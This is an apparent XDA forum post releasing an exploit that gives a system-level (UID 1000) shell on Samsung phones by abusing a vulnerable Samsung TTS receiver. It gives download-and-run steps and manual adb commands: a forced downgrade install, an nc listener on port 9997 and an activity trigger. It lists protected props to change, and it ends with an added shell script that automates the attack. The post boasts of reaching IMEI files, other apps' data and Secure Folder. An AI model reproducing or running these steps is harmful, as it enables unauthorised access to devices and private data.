System Shell Exploit - ALL Samsung Mobile Devices NO BL UNLOCK REQUIRED.
forum.xda-developers.com
THIS IS ACTIVELY IN DEVELOPMENT. Our goal is to make it more user-friendly and easier to use, so please note that things will change and updates will come at any given time, and there are almost certainly bugs to be found and encountered along the way. If you find issues, just let us know here or in the support chat; we are VERY active and can usually get back to you in a few minutes. I will be dynamically updating this post as things progress, keeping it up to date with our current progress.
--UPDATED 01/20/2023: 1:20PM CST PROJECT VERSION 4.5 -- (Fixed Port issues) --
Also confirmed working on the Watch, as mentioned here.
This is an EXPLOIT to get a system-level shell (UID 1000) on ANY Samsung mobile device. No clue if or when it will be patched, but it has worked on every single Samsung device tested so far.
THIS IS THE EQUIVALENT OF DOING "su system", but it DOES NOT invoke or need "su" in any way.
This DOES NOT trip Knox.
This DOES NOT give you ROOT (UID 0)
This DOES NOT directly unlock your bootloader, although you may be able to find a way to do so using this exploit as a tool.
If you use this for your own works, Please give credit.
The next best thing to root on devices without a bootloader unlock option.
Cool things that work:
- Ability to cd to /data/fota and remove updates before they install
- Access to most of /efs: /efs/imei, /efs/sec_efs, /efs/FactoryApp
- Access to most of /data: /data/system, /data/user/0/ANY_SYSTEM_APP
- The "Insthk" bin becomes usable
- Secure Folder/Separated Apps become COMPLETELY compromised if you also install the POC in it (UID 150_system)
- Start IOTHidden Menu, DM Mode, Service Mode, multiple debugging and hidden menus, as well as preconfig, in system context
- Change many protected props, such as:
  setprop persist.service.adb.root 1
  setprop service.adb.root 1
  setprop sys.hidden.otatest 1
  setprop sys.hiddenmenu.enable 1
  setprop persist.sys.knox.device_owner true
  setprop persist.sys.usb.qxdm.debug 1
  setprop sys.usb.qxdm.debug 1
  setprop persist.service.adb.enable 1
  setprop service.adb.enable 1
  setprop persist.rollback.is_test true
  setprop sys.oem_unlock_allowed 1
  as well as quite a bit more.
Note: you need to be on Wi-Fi or a hotspot to set this up.
It's fairly simple: a typical local privilege escalation.
The Easy Way. Note: this could trigger some AVs because of the embedded ADB binary and DLLs, as mentioned in this comment.
You may also find the source and prebuilts on my GitHub, here.
Step 1 - Download "Komraids System Shell.zip" (the latest version is attached) and extract it anywhere on the desktop. Install K0mraids POC.apk and open it at least once. Reboot.
Step 2 - Ensure USB debugging is ON and the computer is authorized. Also make sure power saving is OFF.
Step 3 - When the device is fully rebooted and unlocked, run systemshell.exe.
Step 4 - You should now be in a shell with UID 1000. Enjoy. Be careful with what you mess with.
Things to note: the .exe only needs to be run once after each reboot. If you are having issues with it, or want to open a system shell manually, check out "How it works?" below.
**You MUST downgrade SMT (Samsung TTS) on EVERY reboot**
How it works? (for security researchers, devs, etc.)
Step 1 - Install the included "komraids_POC.apk" on the device, open it and let it load at least once, then push the included "samsungTTSVULN2.apk" to /data/local/tmp (adb push samsungTTSVULN2.apk /data/local/tmp) and run chmod 777 /data/local/tmp/samsungTTSVULN2.apk. I advise disabling all battery optimizations for Samsung TTS and Shell; otherwise it cuts off the shell from time to time.
Step 2 - Make sure ADB is on, the device is connected to Wi-Fi and authorized, and all power saving is off (as mentioned above). Reboot the device. This loads our lib on reboot, since TTS loads all native libs on reboot.
Step 4 - When the device has rebooted, run this command from ADB: adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk. It returns "Success" when done.
Step 5 - Now open two shells (OR see the NOTE below to use App Manager). In the first, run nc -lp 9997, and in the second, run am start -n com.samsung.SMT/.gui.DownloadList. Look back at the first shell; it should now have turned into a new system (UID 1000) shell.
**You MUST downgrade SMT (Samsung TTS) on EVERY reboot**
SMT has a receiver that blindly accepts whatever it is sent, so a carefully crafted APK (our "komraids_POC_v1.5.apk") can trick it into loading our lib, which connects back to the nc listener on localhost port 9997 and hands us a shell!
SOURCE - on GitHub, here.
Use logcat | grep -i mercury to check whether the lib has been loaded.
NOTE: You can use something like App Manager, seen here, or another app installer/manager to launch the SMT activity in step 5; make a home-screen shortcut to it for ease of access if you have issues. Try this instead of using two shells: use one shell for the nc -lp 9997 part and App Manager to launch the activity.
You are now UID 1000. Enjoy.
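The per-reboot part of "How it works?" (steps 4 and 5) as a script, added here as an example; it is not part of the original post or the project's own tooling. It assumes adb is on PATH and that steps 1 and 2 were already done (POC installed and opened, samsungTTSVULN2.apk pushed to /data/local/tmp, device rebooted and authorized). The package name, activity, port, path and pm flags are the ones given in the post; the helper function names are mine, and the sample output formats in the comments are constructed from typical Android output. Unlike the manual steps, it checks the result of each stage: that pm reported Success, that the SMT versionCode actually went down, and it reminds you to confirm uid=1000(system) with id once connected.

```shell
#!/bin/sh
# Added example (not the post's or the project's code). Automates steps 4 and 5 of
# "How it works?" and verifies each stage instead of assuming it worked.
# Assumptions: adb on PATH; steps 1-2 already done on the device.

SMT_PKG="com.samsung.SMT"                         # from the post
SMT_ACTIVITY="$SMT_PKG/.gui.DownloadList"         # from the post
REMOTE_APK="/data/local/tmp/samsungTTSVULN2.apk"  # from the post
PORT=9997                                         # listener port used by the lib

# adb shell output arrives with CR/LF line endings; strip the CRs before parsing.
strip_cr() { tr -d '\r'; }

# Pull the numeric uid out of `id` output such as
# "uid=1000(system) gid=1000(system) groups=1000(system),1007(log) ..."
uid_from_id() {
    printf '%s\n' "$1" | strip_cr | sed -n 's/^uid=\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# Pull the active versionCode out of `dumpsys package <pkg>` output. The first
# "versionCode=" line belongs to the installed package under "Packages:"; a
# downgraded system app also lists the original build later under
# "Hidden system packages:", which is why only the first match is taken.
version_code_from_dumpsys() {
    printf '%s\n' "$1" | strip_cr \
        | sed -n 's/^[[:space:]]*versionCode=\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# `pm install` prints "Success" on success and "Failure [REASON]" otherwise
# (for example INSTALL_FAILED_VERSION_DOWNGRADE when -d is left out).
pm_install_ok() {
    case "$1" in
        *Success*) return 0 ;;
        *)         return 1 ;;
    esac
}

# True when the versionCode after installing is lower than before, i.e. the
# downgrade actually took effect. Usage: downgrade_succeeded BEFORE AFTER
downgrade_succeeded() {
    [ "$2" -lt "$1" ]
}

main() {
    before=$(version_code_from_dumpsys "$(adb shell dumpsys package "$SMT_PKG")")

    # Step 4 from the post, with the result checked rather than eyeballed.
    out=$(adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback "$REMOTE_APK")
    pm_install_ok "$out" || { printf 'pm install failed: %s\n' "$out"; exit 1; }

    after=$(version_code_from_dumpsys "$(adb shell dumpsys package "$SMT_PKG")")
    downgrade_succeeded "$before" "$after" \
        || { printf 'SMT was not downgraded (versionCode %s -> %s)\n' "$before" "$after"; exit 1; }
    printf 'SMT downgraded: versionCode %s -> %s\n' "$before" "$after"

    # Step 5: the listener has to be up before the activity starts, so trigger the
    # activity from a background subshell after a short delay and keep nc in the
    # foreground (-t keeps a pty) as the interactive shell. Once connected, run `id`
    # and expect uid=1000(system).
    ( sleep 3; adb shell am start -n "$SMT_ACTIVITY" >/dev/null 2>&1 ) &
    printf 'Listening on localhost:%s; run `id` in the shell that appears\n' "$PORT"
    adb shell -t nc -lp "$PORT"
}

# Only talk to a device when invoked as: sh systemshell.sh run
case "${1:-}" in
    run) main ;;
esac
```

Run it as "sh systemshell.sh run" after every reboot; the versionCode check is the quick way to tell whether the downgrade the post insists on actually happened, and a shell that reports uid=2000(shell) from id means the lib never connected, in which case logcat | grep -i mercury is the next thing to look at.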